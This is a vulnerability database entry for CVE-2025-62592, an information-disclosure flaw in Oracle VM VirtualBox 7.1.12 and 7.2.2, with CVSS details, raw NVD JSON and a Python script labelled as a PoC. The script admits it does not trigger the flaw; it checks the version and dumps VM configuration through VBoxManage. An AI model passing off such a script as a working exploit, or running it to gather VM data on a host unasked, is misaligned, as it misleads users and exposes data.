Security Vulnerability Report
CVE-2025-62592 CVSS 6.0 MEDIUM

CVE-2025-62592

Published: 2025-10-21 20:20:56
Last Modified: 2025-10-23 16:00:46

Description

Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). Supported versions that are affected are 7.1.12 and 7.2.2. Easily exploitable vulnerability allows high privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. While the vulnerability is in Oracle VM VirtualBox, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle VM VirtualBox accessible data. CVSS 3.1 Base Score 6.0 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N).

CVSS Details

CVSS Score
6.0
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:oracle:vm_virtualbox:7.1.12:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:oracle:vm_virtualbox:7.2.2:*:*:*:*:*:*:* - VULNERABLE
Oracle VM VirtualBox 7.1.12
Oracle VM VirtualBox 7.2.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-62592 Oracle VM VirtualBox Core Component Information Disclosure
# Vulnerability Type: Local Information Disclosure (CWE-269, Improper Privilege Management)
# Affected Versions: VirtualBox 7.1.12, 7.2.2 (the supported versions listed by
#   Oracle; earlier, unsupported releases are not assessed by the advisory and
#   should not be assumed safe)
# CVSS 3.1: 6.0 (Medium) - AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N
#
# Note: This is a conceptual PoC based on the vulnerability description. It only
# checks the installed version and lists VM metadata through VBoxManage under the
# caller's own privileges; it does not trigger the vulnerability, whose details
# Oracle has not published. Actual exploitation requires high-privileged local
# access to the host (PR:H).

import re
import subprocess

VULNERABLE_VERSIONS = {"7.1.12", "7.2.2"}


def get_virtualbox_version():
    """Return the installed VirtualBox version as 'major.minor.patch', or None.

    `VBoxManage --version` prints e.g. '7.1.12r169651'; the build suffix is dropped.
    """
    try:
        result = subprocess.run(
            ["VBoxManage", "--version"],
            capture_output=True, text=True, timeout=10, check=True,
        )
    except (FileNotFoundError, subprocess.CalledProcessError, subprocess.TimeoutExpired):
        return None
    match = re.match(r"(\d+\.\d+\.\d+)", result.stdout.strip())
    return match.group(1) if match else None


def check_virtualbox_version():
    """Check if the installed VirtualBox version is vulnerable"""
    version = get_virtualbox_version()
    if version is None:
        print("[-] VBoxManage not found or did not report a version")
        return False
    # Exact match on the parsed version rather than a substring test, so that
    # a hypothetical 7.2.20 is not mistaken for 7.2.2.
    if version in VULNERABLE_VERSIONS:
        print(f"[+] Vulnerable version detected: {version}")
        return True
    print(f"[-] Version {version} is not in the known vulnerable list")
    return False


def enumerate_vm_data():
    """
    Enumerate VirtualBox VM data accessible to the current user.

    Requires high-privileged local access (PR:H). `VBoxManage list vms` prints
    one '"name" {uuid}' line per registered VM; each VM's configuration is then
    read with `VBoxManage showvminfo` (VBoxManage has no `list vminfo` subcommand).
    """
    try:
        # List all registered VMs
        result = subprocess.run(
            ["VBoxManage", "list", "vms"],
            capture_output=True, text=True, timeout=10,
        )
        print("[*] Registered VMs:")
        print(result.stdout)

        # Read each VM's configuration data
        for line in result.stdout.splitlines():
            match = re.match(r'^"(.*)" \{([0-9a-fA-F-]+)\}$', line.strip())
            if not match:
                continue
            name, uuid = match.groups()
            info = subprocess.run(
                ["VBoxManage", "showvminfo", uuid, "--machinereadable"],
                capture_output=True, text=True, timeout=30,
            )
            print(f"[*] VM information for {name} (may contain sensitive data):")
            print(info.stdout)
    except Exception as e:
        print(f"[-] Error: {e}")


if __name__ == "__main__":
    print("=" * 60)
    print("CVE-2025-62592 - Oracle VM VirtualBox Info Disclosure PoC")
    print("=" * 60)
    if check_virtualbox_version():
        print("[!] System appears vulnerable. Proceeding with data enumeration...")
        enumerate_vm_data()
    else:
        print("[+] System does not appear to be vulnerable.")

References

https://www.oracle.com/security-alerts/cpuoct2025.html - Vendor Advisory (Oracle Critical Patch Update, October 2025)
Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62592", "sourceIdentifier": "[email protected]", "published": "2025-10-21T20:20:55.617", "lastModified": "2025-10-23T16:00:45.680", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). Supported versions that are affected are 7.1.12 and 7.2.2. Easily exploitable vulnerability allows high privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. While the vulnerability is in Oracle VM VirtualBox, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle VM VirtualBox accessible data. CVSS 3.1 Base Score 6.0 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N)."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N", "baseScore": 6.0, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.5, "impactScore": 4.0}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-269"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:oracle:vm_virtualbox:7.1.12:*:*:*:*:*:*:*", "matchCriteriaId": "D0846C94-6984-4E7F-9670-E5238AA8CA5F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:oracle:vm_virtualbox:7.2.2:*:*:*:*:*:*:*", "matchCriteriaId": "613B5554-B57C-4AF9-AC10-E96278C44FC4"}]}]}], "references": [{"url": 
"https://www.oracle.com/security-alerts/cpuoct2025.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}